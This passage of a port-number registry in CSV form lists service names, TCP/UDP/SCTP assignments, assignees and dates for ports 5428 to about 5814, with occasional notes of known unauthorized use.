telaconsole,5428,tcp,TELACONSOLE,[Joseph_M_Newcomer],[Joseph_M_Newcomer],,,,,, telaconsole,5428,udp,TELACONSOLE,[Joseph_M_Newcomer],[Joseph_M_Newcomer],,,,,, base,5429,tcp,Billing and Accounting System Exchange,[Odo_Maletzki],[Odo_Maletzki],,,,,, base,5429,udp,Billing and Accounting System Exchange,[Odo_Maletzki],[Odo_Maletzki],,,,,, radec-corp,5430,tcp,RADEC CORP,[David_Chell],[David_Chell],,,,,, radec-corp,5430,udp,RADEC CORP,[David_Chell],[David_Chell],,,,,, park-agent,5431,tcp,PARK AGENT,[John_Clifford],[John_Clifford],,,,,, park-agent,5431,udp,PARK AGENT,[John_Clifford],[John_Clifford],,,,,, postgresql,5432,tcp,PostgreSQL Database,[Tom_Lane],[Tom_Lane],,,,,, postgresql,5432,udp,PostgreSQL Database,[Tom_Lane],[Tom_Lane],,,,,, pyrrho,5433,tcp,Pyrrho DBMS,[Malcolm_Crowe],[Malcolm_Crowe],2005-11,,,,, pyrrho,5433,udp,Pyrrho DBMS,[Malcolm_Crowe],[Malcolm_Crowe],2005-11,,,,, sgi-arrayd,5434,tcp,SGI Array Services Daemon,[Karl_Feind],[Karl_Feind],2005-10,,,,, sgi-arrayd,5434,udp,SGI Array Services Daemon,[Karl_Feind],[Karl_Feind],2005-10,,,,, sceanics,5435,tcp,SCEANICS situation and action notification,[Richard_Olsen],[Richard_Olsen],,,,,, sceanics,5435,udp,SCEANICS situation and action notification,[Richard_Olsen],[Richard_Olsen],,,,,, ,5436,tcp,Reserved,,,,,,,, pmip6-cntl,5436,udp,pmip6-cntl,,,,,[RFC5844],,, ,5437,tcp,Reserved,,,,,,,, pmip6-data,5437,udp,pmip6-data,,,,,[RFC5844],,, ,5438-5442,,Unassigned,,,,,,,, spss,5443,tcp,Pearson HTTPS,[Pearson],[Pearson],2008-01-17,,,,, spss,5443,udp,Pearson HTTPS,[Pearson],[Pearson],2008-01-17,,,,, ,5444,,Unassigned,,,,,,,Known UNAUTHORIZED USE: Port 5444, smbdirect,5445,tcp,Server Message Block over Remote Direct Memory Access,[Microsoft_Corporation_2],[Tom_Talpey],2012-03-15,,,,, ,5445,udp,Reserved,,,,,,,, smbdirect,5445,sctp,Server Message Block over Remote Direct Memory Access,[Microsoft_Corporation_2],[Tom_Talpey],2012-03-15,,,,, ,5446-5452,,Unassigned,,,,,,,, surebox,5453,tcp,SureBox,[Emin_BORU],[Emin_BORU],2004-11,,,,, surebox,5453,udp,SureBox,[Emin_BORU],[Emin_BORU],2004-11,,,,, apc-5454,5454,tcp,APC 5454,[American_Power_Conve],[American_Power_Conve],,,,,, apc-5454,5454,udp,APC 5454,[American_Power_Conve],[American_Power_Conve],,,,,, apc-5455,5455,tcp,APC 5455,[American_Power_Conve],[American_Power_Conve],,,,,, apc-5455,5455,udp,APC 5455,[American_Power_Conve],[American_Power_Conve],,,,,, apc-5456,5456,tcp,APC 5456,[American_Power_Conve],[American_Power_Conve],,,,,, apc-5456,5456,udp,APC 5456,[American_Power_Conve],[American_Power_Conve],,,,,, ,5457-5460,,Unassigned,,,,,,,, silkmeter,5461,tcp,SILKMETER,[Klaus_Fellner],[Klaus_Fellner],,,,,, silkmeter,5461,udp,SILKMETER,[Klaus_Fellner],[Klaus_Fellner],,,,,, ttl-publisher,5462,tcp,TTL Publisher,[Peter_Jacobs],[Peter_Jacobs],,,,,, ttl-publisher,5462,udp,TTL Publisher,[Peter_Jacobs],[Peter_Jacobs],,,,,, ttlpriceproxy,5463,tcp,TTL Price Proxy,[Peter_Jacobs],[Peter_Jacobs],,,,,, ttlpriceproxy,5463,udp,TTL Price Proxy,[Peter_Jacobs],[Peter_Jacobs],,,,,, quailnet,5464,tcp,Quail Networks Object Broker,[Craig_N_Bissell],[Craig_N_Bissell],2006-04,,,,, quailnet,5464,udp,Quail Networks Object Broker,[Craig_N_Bissell],[Craig_N_Bissell],2006-04,,,,, netops-broker,5465,tcp,NETOPS-BROKER,[John_R_Deuel],[John_R_Deuel],,,,,, netops-broker,5465,udp,NETOPS-BROKER,[John_R_Deuel],[John_R_Deuel],,,,,, ,5466-5499,,Unassigned,,,,,,,, fcp-addr-srvr1,5500,tcp,fcp-addr-srvr1,[Ken_Wittmer],[Ken_Wittmer],,,,,, fcp-addr-srvr1,5500,udp,fcp-addr-srvr1,[Ken_Wittmer],[Ken_Wittmer],,,,,, fcp-addr-srvr2,5501,tcp,fcp-addr-srvr2,[Ken_Wittmer],[Ken_Wittmer],,,,,, fcp-addr-srvr2,5501,udp,fcp-addr-srvr2,[Ken_Wittmer],[Ken_Wittmer],,,,,, fcp-srvr-inst1,5502,tcp,fcp-srvr-inst1,[Ken_Wittmer],[Ken_Wittmer],,,,,, fcp-srvr-inst1,5502,udp,fcp-srvr-inst1,[Ken_Wittmer],[Ken_Wittmer],,,,,, fcp-srvr-inst2,5503,tcp,fcp-srvr-inst2,[Ken_Wittmer],[Ken_Wittmer],,,,,, fcp-srvr-inst2,5503,udp,fcp-srvr-inst2,[Ken_Wittmer],[Ken_Wittmer],,,,,, fcp-cics-gw1,5504,tcp,fcp-cics-gw1,[Ken_Wittmer],[Ken_Wittmer],,,,,, fcp-cics-gw1,5504,udp,fcp-cics-gw1,[Ken_Wittmer],[Ken_Wittmer],,,,,, checkoutdb,5505,tcp,Checkout Database,[Dirk_Stoop],[Dirk_Stoop],2007-04,,,,, checkoutdb,5505,udp,Checkout Database,[Dirk_Stoop],[Dirk_Stoop],2007-04,,,,, amc,5506,tcp,Amcom Mobile Connect,[Aaron_Fracht_Monroe],[Aaron_Fracht_Monroe],2010-06-03,,,,, amc,5506,udp,Amcom Mobile Connect,[Aaron_Fracht_Monroe],[Aaron_Fracht_Monroe],2010-06-03,,,,, ,5507-5552,,Unassigned,,,,,,,, sgi-eventmond,5553,tcp,SGI Eventmond Port,[Andrei_Vilkotski],[Andrei_Vilkotski],2003-06,,,,, sgi-eventmond,5553,udp,SGI Eventmond Port,[Andrei_Vilkotski],[Andrei_Vilkotski],2003-06,,,,, sgi-esphttp,5554,tcp,SGI ESP HTTP,[Vladimir_Legalov],[Vladimir_Legalov],,,,,, sgi-esphttp,5554,udp,SGI ESP HTTP,[Vladimir_Legalov],[Vladimir_Legalov],,,,,, personal-agent,5555,tcp,Personal Agent,[Jackie_Wu],[Jackie_Wu],,,,,Known UNAUTHORIZED USEs on port 5555, personal-agent,5555,udp,Personal Agent,[Jackie_Wu],[Jackie_Wu],,,,,Known UNAUTHORIZED USEs on port 5555, freeciv,5556,tcp,Freeciv gameplay,[Reinier_Post_and_Pau],[Reinier_Post_and_Pau],2006-01,,,,Known Unauthorized Use on port 5556, freeciv,5556,udp,Freeciv gameplay,[Reinier_Post_and_Pau],[Reinier_Post_and_Pau],2006-01,,,,Known Unauthorized Use on port 5556, farenet,5557,tcp,Sandlab FARENET,[Kay_T_Labinsky],[Kay_T_Labinsky],2010-05-03,,,,, ,5557,udp,Reserved,,,,,,,, ,5558-5565,,Unassigned,,,,,,,, westec-connect,5566,tcp,Westec Connect,[Jon_Bolen],[Jon_Bolen],2009-03-18,,,,, ,5566,udp,Reserved,,,,,,,, enc-eps-mc-sec,5567,tcp,EMIT protocol stack multicast/secure transport,[Panasonic_Intranet_Panasonic_North_America_PEWLA],[Bryant_Eastham],2004-11,2012-11-12,,,, enc-eps-mc-sec,5567,udp,EMIT protocol stack multicast/secure transport,[Panasonic_Intranet_Panasonic_North_America_PEWLA],[Bryant_Eastham],2004-11,2012-11-12,,,, sdt,5568,tcp,Session Data Transport Multicast,[Daniel_W_Antonuk],[Daniel_W_Antonuk],2006-05,,,,, sdt,5568,udp,Session Data Transport Multicast,[Daniel_W_Antonuk],[Daniel_W_Antonuk],2006-05,,,,, rdmnet-ctrl,5569,tcp,"PLASA E1.33, Remote Device Management (RDM) controller status notifications",[PLASA],[Simon_Newton],2012-06-01,,,,, rdmnet-device,5569,udp,"PLASA E1.33, Remote Device Management (RDM) messages",[PLASA],[Simon_Newton],2012-06-01,,,,, ,5570-5572,,Unassigned,,,,,,,Known UNAUTHORIZED USE on Port 5570, sdmmp,5573,tcp,SAS Domain Management Messaging Protocol,[Ron_Zuckerman],[Ron_Zuckerman],2007-08-30,,,,, sdmmp,5573,udp,SAS Domain Management Messaging Protocol,[Ron_Zuckerman],[Ron_Zuckerman],2007-08-30,,,,, lsi-bobcat,5574,tcp,SAS IO Forwarding,[Mandar_Joshi],[Mandar_Joshi],2009-02-09,,,,, ,5574,udp,Reserved,,,,,,,, ora-oap,5575,tcp,Oracle Access Protocol,[Peter_Povinec],[Peter_Povinec],2010-04-13,,,,, ,5575,udp,Reserved,,,,,,,, ,5576-5578,,Unassigned,,,,,,,, fdtracks,5579,tcp,FleetDisplay Tracking Service,[Henrik_Woffinden],[Henrik_Woffinden],2008-09-22,,,,, ,5579,udp,Reserved,,,,,,,, tmosms0,5580,tcp,T-Mobile SMS Protocol Message 0,[Ezinne_Oji],[Ezinne_Oji],2006-06,,,,, tmosms0,5580,udp,T-Mobile SMS Protocol Message 0,[Ezinne_Oji],[Ezinne_Oji],2006-06,,,,, tmosms1,5581,tcp,T-Mobile SMS Protocol Message 1,[Ezinne_Oji],[Ezinne_Oji],2006-06,,,,, tmosms1,5581,udp,T-Mobile SMS Protocol Message 1,[Ezinne_Oji],[Ezinne_Oji],2006-06,,,,, fac-restore,5582,tcp,T-Mobile SMS Protocol Message 3,[Jessica_Yan],[Jessica_Yan],2008-02-19,,,,, fac-restore,5582,udp,T-Mobile SMS Protocol Message 3,[Jessica_Yan],[Jessica_Yan],2008-02-19,,,,, tmo-icon-sync,5583,tcp,T-Mobile SMS Protocol Message 2,[Donghwan_Lim],[Donghwan_Lim],2008-01-22,,,,, tmo-icon-sync,5583,udp,T-Mobile SMS Protocol Message 2,[Donghwan_Lim],[Donghwan_Lim],2008-01-22,,,,, bis-web,5584,tcp,BeInSync-Web,[Adi_Ruppin],[Adi_Ruppin],2005-08,,,,, bis-web,5584,udp,BeInSync-Web,[Adi_Ruppin],[Adi_Ruppin],2005-08,,,,, bis-sync,5585,tcp,BeInSync-sync,[Adi_Ruppin],[Adi_Ruppin],2005-08,,,,, bis-sync,5585,udp,BeInSync-sync,[Adi_Ruppin],[Adi_Ruppin],2005-08,,,,, ,5586-5596,,Unassigned,,,,,,,, ininmessaging,5597,tcp,inin secure messaging,[Mike_Gagle_2],[Mike_Gagle_2],2006-05,,,,, ininmessaging,5597,udp,inin secure messaging,[Mike_Gagle_2],[Mike_Gagle_2],2006-05,,,,, mctfeed,5598,tcp,MCT Market Data Feed,[Stephane_Touizer],[Stephane_Touizer],2006-05,,,,, mctfeed,5598,udp,MCT Market Data Feed,[Stephane_Touizer],[Stephane_Touizer],2006-05,,,,, esinstall,5599,tcp,Enterprise Security Remote Install,[Kimberly_Gibbs],[Kimberly_Gibbs],,,,,, esinstall,5599,udp,Enterprise Security Remote Install,[Kimberly_Gibbs],[Kimberly_Gibbs],,,,,, esmmanager,5600,tcp,Enterprise Security Manager,[Kimberly_Gibbs],[Kimberly_Gibbs],,,,,, esmmanager,5600,udp,Enterprise Security Manager,[Kimberly_Gibbs],[Kimberly_Gibbs],,,,,, esmagent,5601,tcp,Enterprise Security Agent,[Kimberly_Gibbs],[Kimberly_Gibbs],,,,,, esmagent,5601,udp,Enterprise Security Agent,[Kimberly_Gibbs],[Kimberly_Gibbs],,,,,, a1-msc,5602,tcp,A1-MSC,[Mike_Dolan],[Mike_Dolan],,,,,, a1-msc,5602,udp,A1-MSC,[Mike_Dolan],[Mike_Dolan],,,,,, a1-bs,5603,tcp,A1-BS,[Mike_Dolan],[Mike_Dolan],,,,,, a1-bs,5603,udp,A1-BS,[Mike_Dolan],[Mike_Dolan],,,,,, a3-sdunode,5604,tcp,A3-SDUNode,[Mike_Dolan],[Mike_Dolan],,,,,, a3-sdunode,5604,udp,A3-SDUNode,[Mike_Dolan],[Mike_Dolan],,,,,, a4-sdunode,5605,tcp,A4-SDUNode,[Mike_Dolan],[Mike_Dolan],,,,,, a4-sdunode,5605,udp,A4-SDUNode,[Mike_Dolan],[Mike_Dolan],,,,,, ,5606-5617,,Unassigned,,,,,,,, efr,5618,tcp,Fiscal Registering Protocol,[efsta],[Alois_Reisinger],2013-08-13,,,,, ,5618,udp,Reserved,,,,,,,, ,5619-5626,,Unassigned,,,,,,,, ninaf,5627,tcp,Node Initiated Network Association Forma,[Thomas_Scholl],[Thomas_Scholl],2006-03,,,,, ninaf,5627,udp,Node Initiated Network Association Forma,[Thomas_Scholl],[Thomas_Scholl],2006-03,,,,, htrust,5628,tcp,HTrust API,[Karl_Olafsson],[Karl_Olafsson],2008-10-24,,,,, htrust,5628,udp,HTrust API,[Karl_Olafsson],[Karl_Olafsson],2008-10-24,,,,, symantec-sfdb,5629,tcp,Symantec Storage Foundation for Database,[Quang_Thoi],[Quang_Thoi],2006-11,,,,, symantec-sfdb,5629,udp,Symantec Storage Foundation for Database,[Quang_Thoi],[Quang_Thoi],2006-11,,,,, precise-comm,5630,tcp,PreciseCommunication,[Alon_Tamir],[Alon_Tamir],2006-04,,,,, precise-comm,5630,udp,PreciseCommunication,[Alon_Tamir],[Alon_Tamir],2006-04,,,,, pcanywheredata,5631,tcp,pcANYWHEREdata,[Jon_Rosarky],[Jon_Rosarky],,,,,, pcanywheredata,5631,udp,pcANYWHEREdata,[Jon_Rosarky],[Jon_Rosarky],,,,,, pcanywherestat,5632,tcp,pcANYWHEREstat,[Jon_Rosarky],[Jon_Rosarky],,,,,, pcanywherestat,5632,udp,pcANYWHEREstat,[Jon_Rosarky],[Jon_Rosarky],,,,,, beorl,5633,tcp,BE Operations Request Listener,[Chirag_Desai],[Chirag_Desai],2006-02,,,,, beorl,5633,udp,BE Operations Request Listener,[Chirag_Desai],[Chirag_Desai],2006-02,,,,, xprtld,5634,tcp,SF Message Service,[VR_Satish],[VR_Satish],2007-08-16,,,,, xprtld,5634,udp,SF Message Service,[VR_Satish],[VR_Satish],2007-08-16,,,,, sfmsso,5635,tcp,SFM Authentication Subsystem,[De_Chih_Chien],[De_Chih_Chien],2008-09-15,,,,, ,5635,udp,Reserved,,,,,,,, sfm-db-server,5636,tcp,SFMdb - SFM DB server,[De_Chih_Chien],[De_Chih_Chien],2008-10-06,,,,, ,5636,udp,Reserved,,,,,,,, cssc,5637,tcp,Symantec CSSC,[Amol_P_Tambe],[Amol_P_Tambe],2011-02-02,,,,, ,5637,udp,Reserved,,,,,,,, flcrs,5638,tcp,Symantec Fingerprint Lookup and Container Reference Service,[Symantec_Corp],[Neel_A_Bhatt],2012-01-03,,,,, ,5638,udp,Reserved,,,,,,,, ics,5639,tcp,Symantec Integrity Checking Service,[Symantec_Corp2],[Danzhou_Liu],2012-05-07,,,,, ,5639,udp,Reserved,,,,,,,, ,5640-5645,,Unassigned,,,,,,,, vfmobile,5646,tcp,Ventureforth Mobile,[Ventureforth_Inc],[Blakely_Snyder],2011-11-03,,,,, ,5646,udp,Reserved,,,,,,,, ,5647-5669,,Unassigned,,,,,,,Known UNAUTHORIZED USE: Port 5666, filemq,5670,tcp,ZeroMQ file publish-subscribe protocol,[Pieter_Hintjens2],[Pieter_Hintjens2],2012-11-01,2013-02-25,,,, zre-disc,5670,udp,Local area discovery and messaging over ZeroMQ,[Pieter_Hintjens_3],[Pieter_Hintjens_3],2012-12-17,,,,, amqps,5671,tcp,amqp protocol over TLS/SSL,[Ted_Ross_2],[Ted_Ross_2],2008-03-26,,,,, amqps,5671,udp,amqp protocol over TLS/SSL,[Ted_Ross_2],[Ted_Ross_2],2008-03-26,,,,, amqp,5672,tcp,AMQP,[Pieter_Hintjens],[Pieter_Hintjens],2006-01,,,,, amqp,5672,udp,AMQP,[Pieter_Hintjens],[Pieter_Hintjens],2006-01,,,,, amqp,5672,sctp,AMQP,[Martin_Sustrik],[Martin_Sustrik],2007-03,,,,, jms,5673,tcp,JACL Message Server,[Stuart_Allen],[Stuart_Allen],2002-02,,,,, jms,5673,udp,JACL Message Server,[Stuart_Allen],[Stuart_Allen],2002-02,,,,, hyperscsi-port,5674,tcp,HyperSCSI Port,[Data_Storage_Institu],[Data_Storage_Institu],2002-02,,,,, hyperscsi-port,5674,udp,HyperSCSI Port,[Data_Storage_Institu],[Data_Storage_Institu],2002-02,,,,, v5ua,5675,tcp,V5UA application port,,,,,[RFC3807],,, v5ua,5675,udp,V5UA application port,,,,,[RFC3807],,, v5ua,5675,sctp,V5UA application port,,,,,[RFC3807],,, raadmin,5676,tcp,RA Administration,[Sergei_Zjaikin],[Sergei_Zjaikin],2002-02,,,,, raadmin,5676,udp,RA Administration,[Sergei_Zjaikin],[Sergei_Zjaikin],2002-02,,,,, questdb2-lnchr,5677,tcp,Quest Central DB2 Launchr,[Robert_M_Mackowiak],[Robert_M_Mackowiak],2002-02,,,,, questdb2-lnchr,5677,udp,Quest Central DB2 Launchr,[Robert_M_Mackowiak],[Robert_M_Mackowiak],2002-02,,,,, rrac,5678,tcp,Remote Replication Agent Connection,,,,,,,, rrac,5678,udp,Remote Replication Agent Connection,,,,,,,, dccm,5679,tcp,Direct Cable Connect Manager,[Mark_Miller_2],[Mark_Miller_2],,,,,, dccm,5679,udp,Direct Cable Connect Manager,[Mark_Miller_2],[Mark_Miller_2],,,,,, auriga-router,5680,tcp,Auriga Router Service,[Vincent_Gaudeul],[Vincent_Gaudeul],2006-02,,,,, auriga-router,5680,udp,Auriga Router Service,[Vincent_Gaudeul],[Vincent_Gaudeul],2006-02,,,,, ncxcp,5681,tcp,Net-coneX Control Protocol,[Ryan_Werber],[Ryan_Werber],2006-06,,,,, ncxcp,5681,udp,Net-coneX Control Protocol,[Ryan_Werber],[Ryan_Werber],2006-06,,,,, ,5682,tcp,Reserved,,,,,,,, brightcore,5682,udp,BrightCore control & data transfer exchange,[Marko_Bjelac],[Marko_Bjelac],2010-06-10,,,,, ,5683,tcp,Reserved,,,,,,,, coap,5683,udp,Constrained Application Protocol,[IESG],[IETF_Chair],2011-06-13,2013-07-25,[RFC7252],,, ,5684,tcp,Reserved,,,,,,,, coaps,5684,udp,DTLS-secured CoAP,[IESG],[IETF_Chair],2013-07-25,,[RFC7252],,, ,5685-5687,,Unassigned,,,,,,,, ggz,5688,tcp,GGZ Gaming Zone,[Josef_Spillner],[Josef_Spillner],2003-01,,,,, ggz,5688,udp,GGZ Gaming Zone,[Josef_Spillner],[Josef_Spillner],2003-01,,,,, qmvideo,5689,tcp,QM video network management protocol,[Jamie_Lokier],[Jamie_Lokier],2006-05,,,,, qmvideo,5689,udp,QM video network management protocol,[Jamie_Lokier],[Jamie_Lokier],2006-05,,,,, ,5690-5692,,Unassigned,,,,,,,, rbsystem,5693,tcp,Robert Bosch Data Transfer,[Robert_Bosch_GmbH],[Klaus_Warth],2011-08-01,2012-07-17,,,, ,5693,udp,Reserved,,,,,,,, ,5694-5695,,Unassigned,,,,,,,, kmip,5696,tcp,Key Management Interoperability Protocol,[OASIS_KMIP_Technical_Committee],[Robin_Cover],2011-07-25,,,,, ,5696,udp,Reserved,,,,,,,, ,5697-5712,,Unassigned,,,,,,,, proshareaudio,5713,tcp,proshare conf audio,[gunner],[gunner],,,,,, proshareaudio,5713,udp,proshare conf audio,[gunner],[gunner],,,,,, prosharevideo,5714,tcp,proshare conf video,[gunner],[gunner],,,,,, prosharevideo,5714,udp,proshare conf video,[gunner],[gunner],,,,,, prosharedata,5715,tcp,proshare conf data,[gunner],[gunner],,,,,, prosharedata,5715,udp,proshare conf data,[gunner],[gunner],,,,,, prosharerequest,5716,tcp,proshare conf request,[gunner],[gunner],,,,,, prosharerequest,5716,udp,proshare conf request,[gunner],[gunner],,,,,, prosharenotify,5717,tcp,proshare conf notify,[gunner],[gunner],,,,,, prosharenotify,5717,udp,proshare conf notify,,,,,,,, dpm,5718,tcp,DPM Communication Server,[Sundar_Srinivasan][Vinay_Badami],[Sundar_Srinivasan][Vinay_Badami],,,,,, dpm,5718,udp,DPM Communication Server,[Sundar_Srinivasan][Vinay_Badami],[Sundar_Srinivasan][Vinay_Badami],,,,,, dpm-agent,5719,tcp,DPM Agent Coordinator,[Sundar_Srinivasan][Vinay_Badami],[Sundar_Srinivasan][Vinay_Badami],2006-05,,,,, dpm-agent,5719,udp,DPM Agent Coordinator,[Sundar_Srinivasan][Vinay_Badami],[Sundar_Srinivasan][Vinay_Badami],2006-05,,,,, ms-licensing,5720,tcp,MS-Licensing,[Thomas_Lindeman],[Thomas_Lindeman],2002-11,,,,, ms-licensing,5720,udp,MS-Licensing,[Thomas_Lindeman],[Thomas_Lindeman],2002-11,,,,, dtpt,5721,tcp,Desktop Passthru Service,[Dan_Leising],[Dan_Leising],2005-01,,,,, dtpt,5721,udp,Desktop Passthru Service,[Dan_Leising],[Dan_Leising],2005-01,,,,, msdfsr,5722,tcp,Microsoft DFS Replication Service,[Guhan_Suriyanarayana],[Guhan_Suriyanarayana],2006-03,,,,, msdfsr,5722,udp,Microsoft DFS Replication Service,[Guhan_Suriyanarayana],[Guhan_Suriyanarayana],2006-03,,,,, omhs,5723,tcp,Operations Manager - Health Service,[Gerardo_Dilillo],[Gerardo_Dilillo],2006-08,,,,, omhs,5723,udp,Operations Manager - Health Service,[Gerardo_Dilillo],[Gerardo_Dilillo],2006-08,,,,, omsdk,5724,tcp,Operations Manager - SDK Service,[Gerardo_Dilillo],[Gerardo_Dilillo],2006-08,,,,, omsdk,5724,udp,Operations Manager - SDK Service,[Gerardo_Dilillo],[Gerardo_Dilillo],2006-08,,,,, ms-ilm,5725,tcp,Microsoft Identity Lifecycle Manager,[Rob_Ward],[Rob_Ward],,,,,, ,5725,udp,Reserved,,,2008-05-02,,,,, ms-ilm-sts,5726,tcp,Microsoft Lifecycle Manager Secure Token Service,[Rob_Ward],[Rob_Ward],,,,,, ,5726,udp,Reserved,,,2008-05-02,,,,, asgenf,5727,tcp,ASG Event Notification Framework,[Arman_Bedonian],[Arman_Bedonian],2009-07-15,,,,, ,5727,udp,Reserved,,,,,,,, io-dist-data,5728,tcp,Dist. I/O Comm. Service Data and Control,[Harish_Kuttan],[Harish_Kuttan],2010-03-22,,,,, io-dist-group,5728,udp,Dist. I/O Comm. Service Group Membership,[Harish_Kuttan],[Harish_Kuttan],2010-03-22,,,,, openmail,5729,tcp,Openmail User Agent Layer,[OpenMail_Encyclopedi][Don_Loughry],[OpenMail_Encyclopedi][Don_Loughry],,,,,, openmail,5729,udp,Openmail User Agent Layer,[OpenMail_Encyclopedi][Don_Loughry],[OpenMail_Encyclopedi][Don_Loughry],,,,,, unieng,5730,tcp,Steltor's calendar access,[Bernard_Desruisseaux],[Bernard_Desruisseaux],,,,,, unieng,5730,udp,Steltor's calendar access,[Bernard_Desruisseaux],[Bernard_Desruisseaux],,,,,, ,5731-5740,,Unassigned,,,,,,,, ida-discover1,5741,tcp,IDA Discover Port 1,[MPITech_Support],[MPITech_Support],,,,,, ida-discover1,5741,udp,IDA Discover Port 1,[MPITech_Support],[MPITech_Support],,,,,, ida-discover2,5742,tcp,IDA Discover Port 2,[MPITech_Support],[MPITech_Support],,,,,, ida-discover2,5742,udp,IDA Discover Port 2,[MPITech_Support],[MPITech_Support],,,,,, watchdoc-pod,5743,tcp,Watchdoc NetPOD Protocol,[Christophe_Chevalier],[Christophe_Chevalier],2005-08,,,,, watchdoc-pod,5743,udp,Watchdoc NetPOD Protocol,[Christophe_Chevalier],[Christophe_Chevalier],2005-08,,,,, watchdoc,5744,tcp,Watchdoc Server,[Christophe_Chevalier],[Christophe_Chevalier],2004-11,,,,, watchdoc,5744,udp,Watchdoc Server,[Christophe_Chevalier],[Christophe_Chevalier],2004-11,,,,, fcopy-server,5745,tcp,fcopy-server,[Moshe_Leibovitch],[Moshe_Leibovitch],,,,,, fcopy-server,5745,udp,fcopy-server,[Moshe_Leibovitch],[Moshe_Leibovitch],,,,,, fcopys-server,5746,tcp,fcopys-server,[Moshe_Leibovitch],[Moshe_Leibovitch],,,,,, fcopys-server,5746,udp,fcopys-server,[Moshe_Leibovitch],[Moshe_Leibovitch],,,,,, tunatic,5747,tcp,Wildbits Tunatic,[Sylvain_Demongeot],[Sylvain_Demongeot],2005-08,,,,, tunatic,5747,udp,Wildbits Tunatic,[Sylvain_Demongeot],[Sylvain_Demongeot],2005-08,,,,, tunalyzer,5748,tcp,Wildbits Tunalyzer,[Sylvain_Demongeot],[Sylvain_Demongeot],2005-08,,,,, tunalyzer,5748,udp,Wildbits Tunalyzer,[Sylvain_Demongeot],[Sylvain_Demongeot],2005-08,,,,, ,5749,,Unassigned,,,,,,,, rscd,5750,tcp,Bladelogic Agent Service,[Brian_Trevor],[Brian_Trevor],2008-10-24,,,,, rscd,5750,udp,Bladelogic Agent Service,[Brian_Trevor],[Brian_Trevor],2008-10-24,,,,, ,5751-5754,,Unassigned,,,,,,,, openmailg,5755,tcp,OpenMail Desk Gateway server,[OpenMail_Encyclopedi][Don_Loughry],[OpenMail_Encyclopedi][Don_Loughry],,,,,, openmailg,5755,udp,OpenMail Desk Gateway server,[OpenMail_Encyclopedi][Don_Loughry],[OpenMail_Encyclopedi][Don_Loughry],,,,,, ,5756,,Unassigned,,,,,,,, x500ms,5757,tcp,OpenMail X.500 Directory Server,[OpenMail_Encyclopedi][Don_Loughry],[OpenMail_Encyclopedi][Don_Loughry],,,,,, x500ms,5757,udp,OpenMail X.500 Directory Server,[OpenMail_Encyclopedi][Don_Loughry],[OpenMail_Encyclopedi][Don_Loughry],,,,,, ,5758-5765,,Unassigned,,,,,,,, openmailns,5766,tcp,OpenMail NewMail Server,[OpenMail_Encyclopedi][Don_Loughry],[OpenMail_Encyclopedi][Don_Loughry],,,,,, openmailns,5766,udp,OpenMail NewMail Server,[OpenMail_Encyclopedi][Don_Loughry],[OpenMail_Encyclopedi][Don_Loughry],,,,,, s-openmail,5767,tcp,OpenMail Suer Agent Layer (Secure),[OpenMail_Encyclopedi][Don_Loughry],[OpenMail_Encyclopedi][Don_Loughry],,,,,, s-openmail,5767,udp,OpenMail Suer Agent Layer (Secure),[OpenMail_Encyclopedi][Don_Loughry],[OpenMail_Encyclopedi][Don_Loughry],,,,,, openmailpxy,5768,tcp,OpenMail CMTS Server,[OpenMail_Encyclopedi][Don_Loughry],[OpenMail_Encyclopedi][Don_Loughry],,,,,, openmailpxy,5768,udp,OpenMail CMTS Server,[OpenMail_Encyclopedi][Don_Loughry],[OpenMail_Encyclopedi][Don_Loughry],,,,,, spramsca,5769,tcp,x509solutions Internal CA,[Brendan_Fay],[Brendan_Fay],2006-02,,,,, spramsca,5769,udp,x509solutions Internal CA,[Brendan_Fay],[Brendan_Fay],2006-02,,,,, spramsd,5770,tcp,x509solutions Secure Data,[Brendan_Fay],[Brendan_Fay],2006-02,,,,, spramsd,5770,udp,x509solutions Secure Data,[Brendan_Fay],[Brendan_Fay],2006-02,,,,, netagent,5771,tcp,NetAgent,[Bradley_Birnbaum],[Bradley_Birnbaum],,,,,, netagent,5771,udp,NetAgent,[Bradley_Birnbaum],[Bradley_Birnbaum],,,,,, ,5772-5776,,Unassigned,,,,,,,, dali-port,5777,tcp,DALI Port,[Wayne_Morrow][Michael_Melio],[Wayne_Morrow][Michael_Melio],2003-10,,,,, dali-port,5777,udp,DALI Port,[Wayne_Morrow][Michael_Melio],[Wayne_Morrow][Michael_Melio],2003-10,,,,, ,5778-5779,,Unassigned,,,,,,,, vts-rpc,5780,tcp,Visual Tag System RPC,[Graham_Bloice],[Graham_Bloice],2009-09-17,,,,, ,5780,udp,Reserved,,,,,,,, 3par-evts,5781,tcp,3PAR Event Reporting Service,[Sushil_Thomas],[Sushil_Thomas],2008-03-10,,,,, 3par-evts,5781,udp,3PAR Event Reporting Service,[Sushil_Thomas],[Sushil_Thomas],2008-03-10,,,,, 3par-mgmt,5782,tcp,3PAR Management Service,[Don_Marselle],[Don_Marselle],2008-04-09,,,,, 3par-mgmt,5782,udp,3PAR Management Service,[Don_Marselle],[Don_Marselle],2008-04-09,,,,, 3par-mgmt-ssl,5783,tcp,3PAR Management Service with SSL,[Don_Marselle],[Don_Marselle],2008-03-19,,,,, 3par-mgmt-ssl,5783,udp,3PAR Management Service with SSL,[Don_Marselle],[Don_Marselle],2008-03-19,,,,, ,5784,tcp,Reserved,,,,,,,, ibar,5784,udp,Cisco Interbox Application Redundancy,[Cullen_Jennings],[Cullen_Jennings],2010-02-03,,,,, 3par-rcopy,5785,tcp,3PAR Inform Remote Copy,[Don_Marselle],[Don_Marselle],2010-02-03,,,,, 3par-rcopy,5785,udp,3PAR Inform Remote Copy,[Don_Marselle],[Don_Marselle],2008-04-09,,,,, ,5786,tcp,Reserved,,,,,,,, cisco-redu,5786,udp,redundancy notification,[Ming_Zhang],[Ming_Zhang],2010-02-04,,,,, ,5787,tcp,Reserved,,,,,,,, waascluster,5787,udp,Cisco WAAS Cluster Protocol,[Winston_Chou],[Winston_Chou],2011-02-08,,,,, ,5788-5792,,Unassigned,,,,,,,, xtreamx,5793,tcp,XtreamX Supervised Peer message,[Ahmad_Tajuddin_Samsu],[Ahmad_Tajuddin_Samsu],2007-02,,,,, xtreamx,5793,udp,XtreamX Supervised Peer message,[Ahmad_Tajuddin_Samsu],[Ahmad_Tajuddin_Samsu],2007-02,,,,, ,5794,tcp,Reserved,,,,,,,, spdp,5794,udp,Simple Peered Discovery Protocol,[Dave_Lindquist],[Dave_Lindquist],2010-05-27,,,,, ,5795-5812,,Unassigned,,,,,,,, icmpd,5813,tcp,ICMPD,[Shane_O_Donnell],[Shane_O_Donnell],,,,,, icmpd,5813,udp,ICMPD,[Shane_O_Donnell],[Shane_O_Donnell],,,,,, spt-automation,5814,tcp,Support 